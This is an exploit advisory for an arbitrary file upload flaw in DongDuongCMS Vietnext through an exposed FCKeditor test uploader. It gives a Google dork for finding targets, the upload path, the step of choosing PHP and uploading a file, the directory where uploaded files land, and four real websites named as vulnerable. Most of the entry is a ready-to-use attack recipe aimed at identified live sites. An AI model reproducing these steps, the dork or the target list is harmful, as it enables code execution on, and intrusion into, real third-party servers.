DongDuongCMS Vietnext Unauthorized File Insertation Vuln

1. ####################################################################
2.  
3. # Exploit Title : DongDuongCMS Vietnext Unauthorized File Insertation Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 04/03/2019
7. # Vendor Homepages : dongduongcorp.com ~ dongduongcms.com ~ vietnext.vn
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:Design by Vietnext ® site:vn
12. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
16. # Reference Link : cxsecurity.com/issue/WLB-2019030021
17.  
18. ####################################################################
19.  
20. # Description about Software :
21. ***************************
22. DongDuongCMS Vietnext is a Vietnamese Web Hosting and Web Development Company.
23.  
24. ####################################################################
25.  
26. # Impact :
27. **********
28. DongDuongCMS Vietnext is prone to an arbitrary file upload vulnerability.
29.  
30. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can
31.  
32. result in arbitrary code execution within the context of the vulnerable application.
33.  
34. Weaknesses in this category are related to the management of permissions, privileges,
35.  
36. and other security features that are used to perform access control.
37.  
38. ####################################################################
39.  
40. # Arbitrary File Upload / Unauthorized File Insertation Exploit :
41. *****************************************************
42. /jscripts/FCKeditor/editor/filemanager/upload/test.html
43.  
44. Choose PHP and upload your file.
45.  
46. # Directory File Path :
47. *********************
48. /vantindat/images/......
49.  
50. ####################################################################
51.  
52. # Example Vulnerable Sites :
53. *************************
54. [+] tudonghoa2hand.com/jscripts/FCKeditor/editor/filemanager/upload/test.html
55.  
56. [+] anhthinh.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html
57.  
58. [+] viettechnic.com.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html
59.  
60. [+] vinhlinh.com.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html
61.  
62. ####################################################################
63.  
64. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
65.  
66. ####################################################################